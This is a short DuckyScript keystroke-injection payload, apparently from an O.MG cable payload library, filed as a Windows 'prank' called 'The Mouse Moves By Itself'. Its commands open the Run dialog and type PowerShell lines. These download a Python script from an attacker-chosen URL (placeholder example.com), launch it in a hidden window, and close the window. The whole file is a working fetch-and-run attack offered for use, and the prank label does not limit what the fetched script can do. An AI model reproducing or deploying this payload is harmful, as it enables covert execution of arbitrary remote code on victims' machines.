omg-payloads/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt

28 lines
777 B
Plaintext

REM ############################################
REM # |
REM # Title : The Mouse Moves By Itself |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ############################################
REM Requirements:
REM - Internet Connection
REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com
DEFAULT_DELAY 500
GUI r
STRINGLN powershell
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
ALT F4